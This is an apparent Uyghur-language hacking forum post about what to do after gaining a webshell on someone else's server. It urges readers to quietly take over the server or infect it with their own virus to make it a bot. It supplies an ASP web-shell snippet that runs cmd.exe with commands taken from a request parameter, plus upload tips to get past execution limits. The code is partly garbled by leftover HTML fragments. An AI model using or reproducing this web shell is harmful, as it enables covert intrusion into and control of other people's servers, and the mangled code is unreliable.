webshell دىكى تەجرىبىلىرىم

بىز مۇۋاپىقىيەتلىك ھالدا wenbshell غا ئېرىشكەندىن كېيىن ، قىلىدىغان ئىشىمىز نىمە ؟ كۆپىنچە تورداشلار باش بېتىگە ئۆزىنىڭ ياخشى كۆرىدىغان گەپ - سۆزلىرىنى يېزىپ قويۇشنى ياخشى كۆرىدىكەن ، لېكىن بۇنىڭ ھېچقانداق پايدىسى يوق ، بىكادىن خەقنىڭ قارغىشىغا ئۇچرىشىغا ئۇچرايمىز . ئەمەلىيەتتە webshell ئېلىشتىكى مەقسەت ئۇ بولماستىن ، بەلكى قارشى تەرەپكە بىلىندۈرمەستىن ئۇنى مۇلازىمېتىرىنى ئېلىش ۋە ياكى ئۆزىمىزنىڭ ۋىرۇسىنى يۇقتۇرۇپ ، ئۇنى ئۆزىمىزنىڭ توخۇسىغا ئايلاندۇرۇش . . . مانا بۇنىڭ ھەقىقي پايدىسى بار .
ئەمدىكى مەسىلە webshell ئالغاندىن كېيىنكى بىرمۇنچە ئاۋارىچىلىق ........... يەنى cmd ئىجرا قىلدۇرماسلىق ، ھەرخىل بۇيرۇقلارنى ئىجرا قىلدۇرالماسلىق دېگەندەك ............
يەنى wscript.shell مۇلازىمىتى ئوچۇق بولمىسا ھەرگىزمۇ بۇيرۇق ئىجرا قىلدۇرالمايسىز ، cmd نى يوللاپ چىقاردۇق دېسەكمۇ ئۇنىڭ نورمال ئىجرا بولۇشى ناتايىن .................
تۆۋەندە مەن مۇشۇ مەسىلىلەرنى ھەل قىلىش ئۇسۇلىنى سۆزلەپ ئۆتەي :
كۆپچىلىكنىڭ ھەممىسى بىلىشى مۇمكىن ، webshell دا exe دىن باشقا ئاساسەن ھەممە ھۆججەتنى چىقىرىشقا يوق قويىدۇ . بىز دەل مۇشۇ ئاجىزلىقتىن پايدىلىنىمىز . ئالدى بىلەن تۆۋەندىكى كودنى asp شەكلىدە ساقلاپ ، ئۇنى بوشلۇققا چىقىرىمىز .

1. 
   
2. <%if err then%>
   
3. 
   
4. <%
   
5. end if
   
6. response.write("") <br /></li><li>On Error Resume Next <br /></li><li>response.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall <br /></li><li>response.write("")
   
7. response.write("
   ")
   
8. response.write("
   ")
   
9. response.write("")
   
10. %>

مەزمۇننى كۆچۈرۈۋېلىش

ئاندىن ئۇنى ئىجرا قىلىمىز . دىققەت قىلىشقا تېگىشلىكى بۇنى cmd.exe بىلەن بىر مۇندەرىجىگە چىقىرىمىز ، چۈنكى ئۈستىدىكى كودتا cmd.exe نى قوزغىتىش بۇيرۇقى بار .
شۇنىڭ بىلەن بىزنىڭ cmd دىكى بۇيرۇقلىرىمىز توغرا ئىشلەيدۇ . ئۈنۈملۈك بولۇش نىسبىتى %80 ، قالغىنىنى ئۆزەڭلەر تەتقىق قىلىڭلار .